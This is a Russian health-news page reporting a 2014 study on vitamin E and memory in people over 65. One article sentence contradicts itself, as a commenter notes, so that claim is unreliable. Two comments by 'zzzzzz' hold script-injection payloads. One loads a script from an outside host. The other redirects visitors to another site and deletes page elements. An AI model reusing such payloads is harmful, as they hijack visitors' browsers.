Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Обычная витаминка спасет ...  >>  Обычная витаминка спасет вас от маразма
 
Обратная связь
 

Обычная витаминка спасет вас от маразма

Размер шрифта
14 октября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Не секрет, что чем мы старше, тем чаще нас подводит память. Однако с этим можно бороться – достаточно лишь употреблять нужное количество витамина Е: он защитит нашу память от возрастных изменений.

Пожилые люди с низким уровнем витамина Е в крови имеют меньше проблем с памятью, чем их ровесники, у которых уровень этого витамина низок. По мнению ученых, различные формы витамина Е играют важную роль в нормальном функционировании процессов запоминания.

Предыдущие исследования, в которых изучалась связь между витамином Е и нарушениями памяти, принимали во внимание только одну форму витамина Е – альфа-токоферол. Он входит в состав многих биологически активных добавок. Однако витамин Е существует в природе в восьми различных формах, в виде токоферолов и токотриенолов, каждая из которых обладает антиоксидантными свойствами.

В исследование были включены 140 человек старше 65 лет, у которых на момент начала эксперимента не было выявлено нарушений памяти. За ними проводилось регулярное наблюдение в течение восьми лет. В итоге ученым удалось выяснить, что высокое содержание витамина Е, а также высокие уровни непосредственно гамма-, бета-токоферола и токотриенолов, играют важную роль в защите от нарушений памяти. По мнению ученых, общий уровень витамина Е достаточно точно отражает содержание всех его форм, а значит и степень защиты организма.

Так что теперь можно помочь своему здоровью с удовольствием: разнообразив свой рацион свежими овощами, орехами, растительными маслами, которые являются важнейшими источниками витамина Е.

О других способах сохранить вашу память в целости и сохранности читайте на страницах нашего одноименного спецпроекта.

Исследование опубликованного в журнале Experimental Gerontology.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

22 января 2015 в 20:02

Цитировать   |   Пожаловаться

"Пожилые люди с низким уровнем витамина Е в крови имеют меньше проблем с памятью, чем их ровесники, у которых уровень этого витамина низок."

Здесь опечатка! 

2 - zzzzzz

30 июня 2015 в 18:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:27

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как первым увидеть в толпе звезду? У нас есть научный ответ!   Посмотрите в свою тарелку! От еды зависит, будет у вас маразм или нет   С какого возраста вы реально помните себя?!   Обычная витаминка против старости!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Проблемы, с которыми справится секс. Часть 4
Как сохранить память. Часть 2
Супереда для вашего иммунитета

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.